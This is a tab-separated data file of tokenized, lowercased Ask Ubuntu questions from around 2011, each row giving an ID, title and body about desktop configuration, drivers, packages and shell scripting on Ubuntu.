49530	bind ctrl+right to nextword in nano ( as it is in all other apps )	and likewise ctrl+left to prevword . i read the man page of nanorc and found bind key function menu so the line bind ^left prevword main would be what i want , the problem is that nano only accepts an alpha character or the word `` space '' so left does n't exist . is there a way to accomplish this ? right now i 'm on natty ( nano 2.2.2 ) but i will upgrade nano if a later ( devel ? ) version can do this .
49531	how can i integrate dropbox with pcmanfm ?	i 'm using lubuntu 11.04 and i installed dropbox . every time i click on the tray icon , dropbox opens chrome to show my files . how to change this behaviour ? it would be nice to open my files from the tray with the regular file manager ( pcmanfm ) .
49532	cant delete files on an external hd	i have an external hd , which is not really healthy ( several sectors not readable ) . i guess thats the reason i have some corrupt files i want to delete these files and found icant delete any file on this even the properties show that i am entitled to do so . any advice ? i opened natilus as sudo , no change .
49536	pointing devices does n't keep configuration	i 'm not able to scroll by my touchpad after reboot . when i set from system > preferences > pointing devices the vertical scrolling , it works till reboot . my x11 current configuration is : section `` serverlayout '' identifier `` default layout '' screen 0 `` screen0 '' 0 0 inputdevice `` synaptics touchpad '' endsection section `` device '' identifier `` intel_iegd-0 '' driver `` emgd '' vendorname `` intel ( r ) deg '' boardname `` embedded graphics '' busid `` 0:2:0 '' screen 0 option `` pcfversion '' `` 1792 '' option `` configid '' `` 1 '' option `` portdrivers '' `` lvds '' option `` all/1/name '' `` lvds-display '' option `` all/1/general/portorder '' `` 40000 '' option `` all/1/general/displayconfig '' `` 1 '' option `` all/1/general/displaydetect '' `` 1 '' option `` all/1/general/videoram '' `` 131072 '' option `` all/1/port/4/general/name '' `` lvds '' # option `` all/1/port/4/general/rotation '' `` 0 '' option `` all/1/port/4/general/edid '' `` 1 '' option `` all/1/port/4/attr/70 '' `` 0 '' option `` all/1/general/accel '' `` 1 '' endsection section `` screen '' identifier `` screen0 '' device `` intel_iegd-0 '' monitor `` lvds '' subsection `` display '' depth 24 modes `` 1366x768 '' endsubsection endsection section `` monitor '' identifier `` lvds '' modelname `` lcd panel 1366x768 '' endsection section `` dri '' mode 0666 endsection section `` extensions '' option `` composite '' `` enable '' endsection section `` inputdevice '' identifier `` synaptics touchpad '' driver `` synaptics '' option `` sendcoreevents '' `` true '' option `` protocol '' `` auto-dev '' option `` device '' `` /dev/psaux '' option `` shmconfig '' `` true '' option `` horizscrolldelta '' `` 0 '' endsection
49537	ubuntu one client does not recognize the internet connection	i am using ubuntu one in ubuntu 10.04 with network manager 0-8.9997-git . the ubuntu one client does not recognize the internet connection and , of course , does not log in or sync my files . is anyone else experiencing this ? any solutions ?
49538	tool to compare directories and files depending on specific given conditions	i 'm looking for a tool that combines the power of several other existing programs as there are diff ( and all guis : meld , diffuse , kompare ) , fslint , rsync , unison . i want to have the possibility to create complex conditions like `` look at filenames but ignore filesize and permissions '' or `` look at filesize but ignore changes up to 100kb '' or `` compare directory structure ( whole path of a file ) '' or of course `` compare by hash sum '' is there such a tool out there ? if not , what workflow would take the least effort to get this done using existing tools ? i am fairly capable of scripting but i hate it to be honest . i do n't like it , to create a script for every little task i have to do . i hope you can help me here .
49540	which should i use : server edition or desktop ( alternative ) edition with command-line installation ?	i want to know the difference because i want to install a base system only ( without all the bloat that comes with the standard desktop edition ) . using the alternative install cd gives me an option to do a command-line install and i read that using the server edition will install the base system + some server related packages ( e.g . web or mail servers ) . the computer is a personal laptop which i will use for personal purposes . i feel that using the server edition is a bit of an overkill ( given by the name -- server edition ) but i fear that if i do use the alternative command-line install , some drivers may be missing . so , which should i use ? server edition ? or alternative desktop edition with command-line install ?
49542	opensource driver for ati hd 6600 needed	laptop : vostro 3550 os : ubuntu 11.04 card : intel integrated = > having trouble with booting up ; ati hd 6600 , the proprietary driver of which does not work - > result in classic gnome desktop without any effects can anyone tell me where to get opensource driver for my ati card ? and how to install it ? thanks
49543	how to install ati radeon 6770 drivers on 10.04 ?	how to install ati radeon 6770 drivers on 10.04 ? are there drivers for this video card at all ?
49546	what kernel version comes with 11.04 ?	what kernel version comes with ubuntu 11.04 ?
49553	how to give shutdown privileges to a user ?	i am using ubuntu 11.04 . i want to run a script which checks for a running process and shuts down the system when that process ends . to do this , the user requires shutdown access so that the script may be executed without requiring a password . i referred to this page and added the text in my sudoers file . however , it 's still asking me the password whenever i execute sudo shutdown -h now . also , i get an error saying root privileges are required , when i execute shutdown without sudo . my sudoers file looks something like this . # cmnd alias specification cmnd_alias shutdown = /sbin/shutdown # user privilege specification root all= ( all : all ) all myusername all = nopasswd : shutdown how can i give permission to a user to execute the shutdown command without having to manually enter the password ? thanks .
49554	how do i reinstall my sound system ?	how can i re-install sounds , it was working very fine . i tried fix an wine sound problem . but i broke my sound on ubuntu . indicator-sound does n't appear linux alz3abi-linux 2.6.39-0-generic-pae # 5~20110427-ubuntu smp wed apr 27 18:53:48 utc 2011 i686 i686 i386 gnu/linux aplay -l returns : aplay : device_list:240 : no soundcards found ... 0 hz @ alz3abi-linux : [ ~ ] $ lspci | grep audio
49557	how do i install maven 3 ?	maven 2 is in the repositories , but not maven 3 . how do i properly install maven 3 ? guides that i found do n't really work properly . i am using natty , but i am sure this wo n't change anything .
49562	how to open a file or folder from terminal with mouse	i 'd like to know if there is a way to open a file or a folder from terminal using the mouse ? when i wrote a url link in terminal , it 's allows me to open that link on my default browser . so i 'd like to do the same with my files and folders . i know that there is a way via cli using gnome-open or xdg-open , but i 'd like a solution that uses the mouse by clicking on the path or the url . eg . when i write `` pwd '' the path allows me to click and open with nautilus it 's the inverse of what `` nautilus-open-terminal '' does .
49566	problem with virtualbox after enabling 'pae ' in 10.04 kernel	i installed the 2.6.32-32-generic-pae kernel over my existing 2.6.32-32-generic kernel . this solved the problem i had with the system not showing the full amount of ram , but it has had a side-effect . i ca n't start my virtualbox vms . i get this message : kernel driver not installed ( rc=-1908 ) please install the virtualbox-ose-dkms package and execute 'modprobe vboxdrv ' as root virtualbox-ose-dkms was already installed and when i ran sudo modprobe vboxdrv , i got another error message : fatal : module vboxdrv not found . i purged virtualbox-ose-dkms ( complete removal ) and then re-installed it , but i still got the same error . i then repeated the full re-installation , but this time with the previous non-pae kernel . it works , but fails when i reboot into the pae kernel . next i uninstalled and then re-installed virtualbox into the pae system , but it gave the same error . what can i do to get virtualbox running with the pae kernel ?
49568	how to use the connection from the nokia e7 with the onbord fare harddisk conection ?	i would like to know if it is possible to connect my nokia e7 over wifi to ubuntu one using fare harddrive connection equiped on the nokia in the connection manager ? regards
49569	tv hdmi output and resolution issues ; broken after 11.04 upgrade	i have a dell inspiron 1525 laptop w/ intel graphics : lspci : 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) my tv is an olevia 27 '' which shows up in the display settings as `` synaptics inc 27 '' . my hdmi output worked perfectly fine up through 10.10 and kernel 2.6.35-29 , but yesterday i upgraded to 11.04 and now i have problems . the output to my tv still works , though there are tons of `` scan lines '' and any time i move the mouse or drag an application to the tv ( vlc for instance ) , the lines get worse and go crazy . in display settings the tv is set by default to 1360x768 @ 60hz which has always been the default and worked just fine , until 11.03 w/ the 2.6.38-10 kernel . i believe the native resolution of the tv is 1366x768 but the 1360x768 always worked . i did figure out that i can set the resolution to 1024x768 @ 75hz and the scan lines go away , but this is not ideal . i tried reverting back to the 2.6.35-29 kernel to see if it worked as it originally did in 10.10 , and the scan lines do not appear , however the display only takes up 3/4 of the tv , with the other 1/4 black and most certainly the border . definitely even less ideal . so i 'm back on the 2.6.38-10 kernel for now using the lower resolution . i also notice that when playing a video , the video appears to be just a few milliseconds behind the audio ; not a huge delay but just enough to be noticeable . after a lot of googling i tried to use xrandr to add and set a new mode of 1366x768 @ 60hz for the tv , but the lines remain . my xrandr output is as follows : screen 0 : minimum 320 x 200 , current 2304 x 800 , maximum 8192 x 8192 lvds1 connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1280x800 60.0*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1024x768+1280+0 ( normal left inverted right x axis y axis ) 600mm x 340mm 1360x768 60.0 + 1280x800 59.8 1280x768 59.9 60.0 1280x720 60.0 1024x768 75.1* 70.1 60.0 800x600 72.2 75.0 60.3 56.2 848x480 60.0 640x480 75.0 72.8 60.0 59.9** tv1 unknown connection ( normal left inverted right x axis y axis ) 848x480 30.0 + 640x480 30.0 + 1024x768 30.0 800x600 30.0 so , does anyone know what might have changed in the new kernel/video drivers that would cause this behavior to change from it 's previously perfect operation in 10.10 and below ? tia !
49571	how do i switch between virtual terminals in a guest system ?	i want to access virtual consoles in my ubuntu guests running virtualbox with ubuntu guest . however , even if the focus is within the guest window , if i press ctrl+f1 thru f6 i move in a virtual terminal of the host , not the guest . how do i switch to a virtual terminal in the guest os ?
49572	how do i restore the sources.list file ?	i accidentally removed my /etc/apt/sources.list file . is it hosted by canonical somewhere so i can re-add it to the system ? it 's a bit of an emergency , so i hope someone can provide a quick answer .
49577	how can i get the latest unity updates ?	well , i 've tried using the ppa posted in omg ubuntu ! . but nothing appears in the update manager . so how do i get the updates without adding the ppa for unity 3.8.16 ?
49578	get package description using apt	how do i get the prosaic description of a package using apt ? i tried both apt-cache show and apt-cache showpkg but no luck . using synaptic it 's easy as typing the package name and the description is given by the standard view , but sometimes i 'd prefer to just use apt-cache , for example from terminal .
49583	my laptop does n't always boot to login	i have an recurring problem . every once in a while , no pattern , the laptop freezes during boot . sometimes at a black screen , sometimes a black screen with a not blinking cursor ... the solution is to power down the laptop , cross my fingers and boot again . sometimes it takes four or five reboots , but in the end i always get the system up and running . what bugs me is the fact that the boot is not 'stable ' in a sense that apparently it does n't always do exactly the same thing . i 'm still using 10.10 . the question is whether there is anything that can be done to make the system stable . ( does 11.04 have the same issue ? ) edit : today the same thing happened . first a black screen with a non blinking cursor . second a black screen . third login screen .
49586	black screen after resume from sleep ( kubuntu )	i know there is a lot of other posts like this , but i have been looking for hours and i still have n't found any solution . i have recently installed kubuntu linux along side my windows 7 , the sleep on my win7 works fine and resumes like normal . when i am loaded into kubuntu , and i put my laptop to sleep , it goes into sleep as normal . when i go to resume from the sleep , the screen stays solid black , it does n't light up , no blinking curser or anything . the wi-fi light is 'off ' ( orange ) and i can not turn it on . the caps lock and the num lock lights on the keyboard blink slowly . i hear something on the inside of the computer start to spin . i am not very experienced with kubuntu/linux , but i do know a bunch of computer terminology , i am still far from an expert though . i have about 300gb designated to my win7 stuff , and another partition with about 100gb for my kubuntu linux . my computers specs are as follows : windows 7 64-bit i have the most recent version of kubuntu because i just downloaded it a few days ago and updated it yesterday . amd athlon duel-core processor 4gb of ram and it is a hp g61 laptop
49588	one click to fold and double click to unfold menu	i have ubuntu 11.04 installed . i like unity 3d . i am not sure it was always like this or after i installed the main menu indicator . when i click on an indicator with one click it folds . to unfold the menu i need to click twice . on all menus i can open the action by one click , but the global indicator menu forces me to do two clicks to start the application . ideas ? suggestions ?
49593	rhythmbox and external hard drive	i keep my whole music collection on my external hard drive . is it better to import those files into rhythmbox library or should i make my hard drive recognized as mp3 player by putting .as_music_player in it 's root ?
49594	lm-sensors ca n't find fans on a acer laptop	i have installed ubuntu 11.04 32bit on my acer 7750g laptop , and very thing works like a charm except the fan which keeps running . i researched on google and found that perhaps i need to install lm-sensors . i did very thing according to the relative posts that i had googled . but the result of sensors-detect was only one driver `coretemp ' . then the result of sensors was : coretemp-isa-0000 adapter : isa adapter core 0 : +47.0°c ( high = +86.0°c , crit = +100.0°c ) coretemp-isa-0002 adapter : isa adapter core 1 : +49.0°c ( high = +86.0°c , crit = +100.0°c ) coretemp-isa-0004 adapter : isa adapter core 2 : +50.0°c ( high = +86.0°c , crit = +100.0°c ) coretemp-isa-0006 adapter : isa adapter core 3 : +47.0°c ( high = +86.0°c , crit = +100.0°c ) and then i could not go any further . question 1 : my cpu is intel i7 2630qm , but why only 4 cores are detected ? question 2 : why ca n't i find sensors of fans ? i have tried with lm-sensors 3.2.0 and 3.3.0 . and i have read this , this .
49597	is it normal for laptop fans to completely turn off ( sometimes )	i have noticed significantly lower cpu temperatures on 11.04 as compared to 10.04 on my dell studio 15 laptop . and this is a really good thing . so good , that sometimes , my laptop fans completely turn off for a while and then start at a low speed again , before turning off again . is this normal ? i am sure it is not a hardware problem or anything because i can feel the base of the laptop and it is really cool ( and lm-sensors reports core temperatures at 49 degrees c , i have never seen this go below 50 on the pre-installed windows 7 actually ) , but i am not sure if it is normal for the fans to go off once in a while . needless to say , this does not happen all the time , only when i am doing something extremely lightweight . thanks !
49603	dell d820 - nvidia - compiz crashes / wo n't run	i 'm running a dell latitude d820 and a fresh / clean install of ubuntu 11.04 x64 . my graphics card is detected as nvidia corporation g72m [ quadro nvs 110m/geforce go 7300 ] ( it 's the nvs 110m - the go is the non-oem version i believe ) . i 'm running the recommended drivers from the additional drivers dialog . i have tried running compiz -- replace and unity -- reset , but both commands hang my laptop . i 'm not really sure what other information i need to provide , so please let me know . one more thing . when i run compiz -- replace , it freezes on `` starting unity-window-decorator '' many thanks ! edit : compiz is not running , and i do have the compiz config manager installed . when i run ccsm from terminal this is the output i get . does anyone know what those errors mean ? http : //pastebin.com/2wjzw3zu note , this dump is from `` ubuntu classic '' ; i get something similar if i run in unity mode , but the profile says unity . i should also say that it looks like unity will load , but will hang up the display after . for example , i 'll see the drop shadows on the windows , the cursor will change if i 'm hovering over a window border or something , but nothing on the ui will update . i can manage to click on my terminal shortcut and type sudo reboot and it will reboot , so it 's just the gui that 's crashing .
49604	pressing dead keys twice	i 've recently switched from windows to ubuntu 11.04 , and a difference that bugs me a bit is , when a dead key ( such as ^ or ´ ) is pressed twice , the behavior differs in the two os'es . on windows , the first press is dead , but the second press gives you two characters . so , for instance , pressing ¨ once nets you nothing , but twice nets you ¨¨ . on ubuntu , the first press is also dead , but the second press only nets you one character . so , pressing ¨ once nets you nothing , twice nets you ¨ . what i 'd like to do is make dead keys function as on windows , that is , pressing them twice nets you the character two times . i do not wish to make them non-dead , as i then would n't be able to write for ü , for instance . is such a thing possible , and if so , how ?
49606	how do i disable the blinking cursor in gnome-terminal ?	i could have sworn that there was once a setting for this in the gnome-terminal `` profile '' . and then in some version of ubuntu , that setting disappeared , and i had to use system â preferences â keyboard to uncheck `` cursor blinks in text fields '' . well , neither of those seems to be working now . so how do i make the cursor stop blinking ?
49607	horrible sound quality/dropouts over bluetooth with usb receiver ?	i 'm getting really horrible results when trying to play back audio from my computer to my new motorola s305 headphones . i currently have a knock-off usb bluetooth adapter which is n't exactly the best quality in the world . should i get a new adapter , and if so , which one should i invest in which works well with ubuntu ? i 'd also like it to have bluetooth 3.0 , has this been implemented yet ?
49608	system monitor and top reporting wildly different memory usage	lately , while browsing , i often get that the computer comes to a crawl . at the same time i notice memory consumptions of close to 90 % by programs/ 10 % as cache as indicated by the system monitor applet in my panel . trying to find out which program is slowing down my computer i issue the top command in the terminal , but adding the numbers in the mem % column there does n't even come close to 20 % . what is the cause of this discrepancy ? what is the correct way to do i find out which program is consuming exessive amounts of memory ? i do n't know if this is helpfull information , but for reference , the output of free -m is : total used free shared buffers cached mem : 2993 2935 57 0 3 369 -/+ buffers/cache : 2563 429 swap : 5809 1514 4295
49609	how do i add the `` proposed '' repository ?	i 'm trying to either test a fix that 's been proposed or i want to volunteer to test stable release updates before they are pushed out to general users , how can i enable the `` proposed '' repository ?
49612	does the netgear wpn511 pcmcia card work with 64bit natty ?	hello fellow ubuntu users ! i am looking to purchase the netgear wpn511 pcmcia card to use with ubuntu natty 64-bit . does this card work with 64-bit ubuntu ? if it does not , can someone recommend a pcmcia wireless card that will work on 64-bit natty ? thanks for the help !
49613	usual wireless password rejected	i own an : linksys wmp600n pci wireless adapter with dual-band and have recently installed ubuntu . it detects my home network ( with about 3 bars ) , however , when i enter the wireless password ( which i know to be correct from my windows 7 install ) it simply attempts to connect and then asks for the password again . hopefully this is a sign of something else that needs fixing , but what i do not know . does this sound like a card specific problem ?
49623	can not figure out how to put up side panel in 11.04	i can not figure out how to get that cool looking side panel in everyone 's screenshot
49625	recommend a quality condenser mic ?	could you please recommend a decent usb condenser mic that works fine in ubuntu ? im looking for something of quality without breaking the bank either . hopefully a mic under $ 150 . would you happen to know of any mics in this price range ? i guess usb is not absolutely a necessity unless there might be some added benefits for having usb . thanks much !
49626	how to remove sign-in ( password ) fields when i boot up ?	i have to sign in five times after opening ubuntu . three times for the login keyring which says it is not unlocked until the third sign-in , and twice for the `` default '' keyring . i would like to remove the sign-in process completely as i do not require a locked computer . can i safely remove the password app ?
49627	how do i share my ubuntu 's internet connection with a lan ( via hardware router )	i know this sort of question has been asked many times , and i 've thus tried many ways to get it working , but i think my setup is a bit different from what i 've seen others trying . i 've got an ubuntu box with a usb mobile broadband modem that connects me to the internet , and i 'm trying to share this internet connection with an ordinary linksys router ( wrt120n ) , and thereby with my wifi lan . i 've connected my ubuntu box to the router via ethernet , but do n't know how to get the router to use my internet connection . maybe this is more of a problem with the router configuration , but i tried creating a new wired connection in ubuntu and selecting `` shared to other computers '' under method , which seems useless . is there some easy way to make the router use the internet connection used by the ubuntu box for the lan ?
49630	error installing ettercap-gtk	i 'm trying to reinstall ettercap-gtk after i removed it , since it was randomly closing out for some reason , and this is the error i get # apt-get install ettercap-gtk reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : ettercap-gtk 0 upgraded , 1 newly installed , 0 to remove and 4 not upgraded . need to get 0b/838kb of archives . after this operation , 0b of additional disk space will be used . ( reading database ... 277050 files and directories currently installed . ) unpacking ettercap-gtk ( from ... /ettercap-gtk_0.7.3-bt0_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/ettercap-gtk_0.7.3-bt0_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/etterlog ' , which is also in package ettercap-common 1:0.7.3-1.4ubuntu1 errors were encountered while processing : /var/cache/apt/archives/ettercap-gtk_0.7.3-bt0_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ` thanks for any help , i am still pretty new to linux so i 'm confused by this error .
49631	is there a way to set shortcut-keys for specific opened windows in gnome ?	i 'm using ubuntu 10.10 and i always have opened windows : browser , console , vim and skype . i want to set specific shortcut-keys for those windows . is there a way to use for example : win-c = google chrome win-t = terminal win-s = skype i want use hotkeys to switch between these windows .
49636	no output on `gpg -- fingerprint` when retrieving the key for launchpad	i 'm trying to sign ubuntu code conduct for creating my own ppas . i run the gpg -- fingerprint command on my server as asked by the launchpad how-to . the problem is - there is no output whatsoever . here 's the output i got when i ran the command for the very first time : $ gpg -- fingerprint gpg : directory `/home/eimantas/.gnupg ' created gpg : new configuration file `/home/eimantas/.gnupg/gpg.conf ' created gpg : warning : options in `/home/eimantas/.gnupg/gpg.conf ' are not yet active during this run gpg : keyring `/home/eimantas/.gnupg/pubring.gpg ' created gpg : /home/eimantas/.gnupg/trustdb.gpg : trustdb created the consequent command invocations give no output at all . i even tried redirecting the output to the file ( thinking it checks for stdout type ) , but still - no results . where does the output go ? should i configure something extra ?
49639	how can memory be freed for inkscape ?	i 'm working on a large map with inkscape on a dell vostro 1510 . computer specifications are : intel ( r ) core ( tm ) 2 duo cpu t5670 @ 1.80ghz total memory : 3014 mib ( 70 % free ) total swap : 3060 mib ( 85 % free ) cached : 660 mib active : 798 mib inactive : 768 mib graphic card : intel gm965/gl960 integrated graphic controller working on this map is very slow , i can not do the slightest thing without waiting for 5 min until the new event is repainted on screen . i 'm a bit perplexed though : i may not have a top computer but it should be able to perform better i think . the map is working on is large , there are many vectors , but it seems nothing compared to viewing 3d , playing a movie or a flash animation . so i 'm suspecting inkscape enjoys a limited amount of memory -- especially because other programs perform well in the meantime . so is there a way to free up memory for inkscape so i can work fast ? thanks .
49645	how do i install the newest version of the software center in 10.10 ?	i was wondering if there was a way to upgrade the ubuntu software center without upgrading from 10.04 to 10.10 . i am content with 10.04 and have no wish to upgrade . however the new features of the software center intrigue me and i would like to check them out .
49647	override theme background color for certain applications	when using a custom theme ( equinox evolution midnight in my particular case ) the manager at system > preferences > appearance > theme > customize > colors is indeed reflecting the actual system-wide styling , but , turns out certain applications ( libreoffice , bluefish editor and many others ) are actually overriding that theming as they display a white background . so i was wondering if there 's a sort of centralized way to manage such exceptions ( as in fact i 'd like to have all my text editors overriding the dark background ) or i should set that up in a per-application fashion ? any guidance will be sincerely appreciated , thanks much in advance .
49651	how to change the login screen keyboard layout ?	i switched from qwerty to dvorak , but the login screen still uses qwerty . how can i configure the login screen to use dvorak ?
49653	chromium browser lost fonts rendering ?	i was trying to change the style and appearance of kde applications in ubuntu . everything else look fine . how to fix this issue ?
49656	gui for patch command	is there any gui available for patch command ? i need it because sometime i need to see the actual file before applying patch to it and it is very cumbersome to open patch file and then open the individual files listed in there . even if i do that i cant compare the modified i.e patched file and unmodified/unpatched file .
49657	is it possible to create access point on a laptop , which is connected to router with wifi ?	laptop # 1 is connected to the router via wifi . laptop # 2 is too far away from router to be able to connect to them . i can create a access point or ad-hoc if i am connected to the router via wired network . but laptop # 1 is not connected to router via cable , but via wifi . is it somehow possible to create acces point or ad-hoc on computer , which is connected to router via wireless ? any help is appreciated .
49666	how to make all fonts available in konsole/yakuake ?	at the moment i only have monospaced fonts and not all of them ( i have the ubuntu monospaced font and it is not listed in the dialog ) . update : i forgot to mention that i use gnome 2 .
49670	workspace switcher bindings do not always work ?	is it normal that switching through workspaces with ctrl +alt +left/right/up/down does n't work when i close the last window on the active desktop ? is there a way to alter this behavior ? thanks
49671	how to reload variables from /etc/environment without re-logging in ?	how to reload variables from /etc/environment without re-logging in ? source /etc/environment in bash works for program run through terminal , but running programs through shortcuts at gui does not work .
49674	what is the status of multiarch for 11.10 ?	what is the planned status of multiarch support in 11.10 ? in amd64 alpha 1 , i attempted to install the i386 google chrome package using dpkg . the install failed citing architecture mismatches , is support for this kind of install planned or am i missing something ?
49680	compiz expo expo_edge setting not retained after restart	i used the topright setting for my expo_edge setting . on each reboot this setting is non-functional even though it is still set in gconf-editor settings . i can reset things by using gconf-editor to remove the setting and then add the setting back . however , the next boot the setting is again non-functional . i am unsure what is causing the conflict , but moving the edge to bottomright enables it to remain functional after a reboot . the bottomright is normally what i use for my initiate_all scale setting so i would like to keep the expo_edge setting in the topright if possible . update : if i do alt+f2 and unity -- replace the setting is lost as well .
49687	is it possible to copy u1 files between two pcs locally when an ubuntu user account is recreated ?	i have 2 ubuntu 11.04 pcs ( desktop and laptop ) , both synced via u1 . recently i completely rebuilt the user account ( completely deleted the home directory ) on one of the two ( the desktop ) , and now i have to resync . problem is that the pc is on a slow connection and i have difficulties resyncing the 14gb of data . of course i have the opportunity of moving it to a place where the connection is faster , but it 's not comfortable , and it will take some time . since the laptop is in sync with the account i was wondering if stopping the service and copying the files + some database ( which files is the question ) could let me avoid resyncing everything ... ..
49688	how can i trigger something once i connect to internet ?	i wonder how can i make the machine do something each time it connects to internet ? like checking for updates once i 'm connected to internet ? thanks
49690	confused about desktop/viewport switching , want to bind keyboard shortcuts to switch desktops	i 've installed a pre-made ubuntu 10.04 image at work , and i ca n't seem to figure out how to get desktop switching to work . no shortcuts work , and all the help i can get from the ubuntu forums is `` ctrl-alt-left/right should work . '' so let me get this straight . switching between desktops is deprecated , so we use viewports , which are managed by compiz , which has one of the most absurd configuration managers out there . lovely . can anyone straighten this out for me , and anyone else who might stumble on this question ?
49691	what is the `` proposed '' repository ?	what exactly does this repository contain and why should a user either stay away from it , or add the repository ?
49697	how do you use opera 's built-in irc client ?	i 've been trying to use the built-in irc client , but failed in all attempts . i 'm posting this question a bit late , so i do n't exactly remember what the error message was , but it was in the lines of the user not providing enough details . i 've skipped providing real name and email address at the first run - could this be the cause ? i hope someone can provide a concise guide to setting it up .
49698	how can i find out which user deleted a directory ?	my ubuntu server has about roughly 30 active users on it . i personally know everyone using the server . recently , a few friends and i were working on project . we made a new directory for the project and since everyone knows everyone we did n't bother protecting our work under a bunch of permissions . we should have though , because we woke up this morning to find that someone removed our entire directory . our work is backed up every night so it 's really not a big deal to restore our work . however , we would like to find out who removed it so we can confront them . so far the best thing we 've come up with for finding our culprit is checking everyone 's bash history but this is long and tedious and chances are that if there was a malicious intent behind the directory removal that our culprit probably modified theirs to cover their tracks ( or of course they might use a different shell ) . so , basically , what is the easiest and quickest way to find out who deleted a directory ? thanks in advance for your time .
49700	livecd not booting/ca n't install	so , i got a new laptop some days ago , and as usual i formatted it to install ubuntu . i downloaded 11.04 and burned it on my pendrive using my old laptop ( running 11.04 ) . when i tried to boot from the liveusb on my new laptop , it just showed me some weird graphics and if i select any option ( ca n't see what i 'm selecting ) , it gives me a black screen and that is all . then i tried to boot with this liveusb on my old laptop , and it worked just fine ._ . i burned a cd with ubuntu 11.04 ( 64-bit ) and the problem continued . then i thought it could be my cd driver , since the laptop is new and all ... burned a windows 7 64-bit dvd and it worked just fine . also , if i check the cd/pendrive inside windows 7 , all the files there are ok . anyone have any idea of what can be ? i found lots of questions about this , but none of them had the weird menus i 'm getting ._ . oohh ... i also get a `` prefix is not set '' before the weird menu appears : s my system specs : intel core i5 2400 intel hd 3000 4gb ddr3 if anyone can help , i will be really grateful ._ .
49704	where can i download the gnome 3 icons ?	after poking around on the internet for awhile , i have n't been able to find the default icons used in gnome 3 anywhere . my requirements are fairly simple : svgs would be nice , but not necessary this does n't need to be installable as an icon theme in ubuntu a compressed folder with all of the icons would be good , but i do n't mind browsing a repository and downloading individual icons . as a last resort , i could always download a full gnome 3 iso and find the icons that way , but hopefully someone knows of a better solution .
49707	getting eclipse cdt helios to recognize i586 gcc mingw32 as a compiler , any ideas ?	i installed cdt direct by extracting the tar . it detects the other compilers , but fails to recognize mingw32 as a compilation target . any ideas ? unless you 've tried a tutorial and it recognizes properly , please no links to the first 5 google results ... i tried them . by the way , i 'm on 10.04 lts . the same situation occurs on 11.04 and 11.10 .
49711	automatic ftp transfer like fling ?	i 'm a web-developer , i 'm using win7 , but now i want to try ubuntu , i want to ask if is on the ubuntu any software which automatically upload the folder content to the server . for example if i save a file that automatically upload to the server through ftp . on the windows i 'm using fling is there any alternative on ubuntu ?
49712	how to fix 3d cube bug for unity 3d	tried enabling 3d cube in ubuntu 11.04 unity 3d , ha not knowing about the bug , now every time i log into it , it does n't display anything but the background wallpaper . must help ... . ubuntu classic is n't doing it for me .
49715	script for opening tabs in guake terminal	i am using this script with gnome terminal : # ! /bin/sh gnome-terminal -- tab -- title= '' 1 '' -- command= '' ssh 1 '' \ -- tab -- title= '' 2 '' -- command= '' ssh 2 '' \ -- tab -- title= '' 3 '' -- command= '' ssh 3 '' \ -- tab -- title= '' 4 '' -- command= '' ssh 4 '' exit 0 how can i do the same things by script but on a guake terminal ?
49716	java is not working on some websites	i have icedtea6-plugin installed on my ubuntu box . the weird thing is , when i am browsing the internet , certain websites are able to use java and some websites do n't . for instance , i am able to log in to my bank at http : //www.nordea.dk/ ; they use a java applet to authenticate the user . but when i try to use http : //keepvid.com/ ; it says loading java applet . and then after a minute or two it says : error : please click here to download java , if you already have java , please restart your browser and try again . i 've tried to restart my computer , closed and opened chromium browser . but it did n't work also . could someone please point me in the right direction to solve this problem ? thanks .
49719	adding bash script to disable nvidia graphic card at startup ?	i 've found the way to disable my hybrid card gt 540m on asus k53sv at : https : //launchpad.net/~hybrid-graphics-linux that 's great , but i need those commands to be executed automatically at startup . so i followed the instructions here . actually , i copy the bash file instead of creating link in /etc/init.d/ however , it does n't work at all . my script is : # ! /bin/bash echo `` start my own acpi_call '' cd cd acpi_call insmod acpi_call.ko ./test_off.sh echo `` finished.thank you '' i tried both using `` sudo insmod '' and `` insmod '' only but still no effect . what 's wrong with it ?
49721	bash dirtrim produces strange results with ~/foo/bar/var directory	in some of my projects , i keep a var or a lib folder for runtime output and external libraries . to keep my prompt rather short , i have the export prompt_dirtrim=3 option in my .bashrc . this works very well for most paths , but as soon as i have a /var in there , it goes nuts like this ( for ~/projects/someproject/var/gfx ) : ~/ ... /gfxr/gfxr/gfxr/gfxr/gfxr/gfx interestingly , it works with /opt/lampp/lib is there some way to get around this ? my .bashrc my .bash_functions
49729	client for checkpoint endpoint security vpn	in windows , i use a client called `` checkpoint endpoint security '' , with an certificate file , in order to connect to the checkpoint vpn . is there a compatible solution for ubuntu ?
49731	how to read init.d script start argument	in reference to the following documentation , how can i read the start and stop argument ? i want to tell if the computer is booting up or shutting down so that i can run the correct script . to make the script run with the start argument at the end of the start sequence , and run with the stop argument at the beginning of the shutdown sequence : sudo update-rc.d myscript defaults 98 02 i want to do something like this : if [ startargument `` start '' ] then ./startscript else ./shutdownscript
49732	how to make changes in gconf-editor permanent	every time i open my computer , i need to manually unset the value of button_layout in gconf-editor in /apps/metacity/general to make to the close , minimize and maximize buttons on the right side of the window , but every time i restart my computer it changes back to the left side . i 've tried to right-click the setting and choose `` set as default '' - but this does n't work . how can i make this be permanent ?
49738	how to recover partially removed components of ubuntu-desktop ?	so i was messing around with tasksel to install lamp . foolishly i unchecked the ubuntu-desktop item . about 25 % through the process i realized it is removing my desktop components . so i closed the terminal window , but now maybe something went wrong . many default applications are gone and i ca n't even boot into the desktop . i have a separate home folder so i do n't really have to worry about data , but i did install a lot of other software which would be gone if i take reformat and reinstall . so is there a way to recover the desktop from a live cd ?
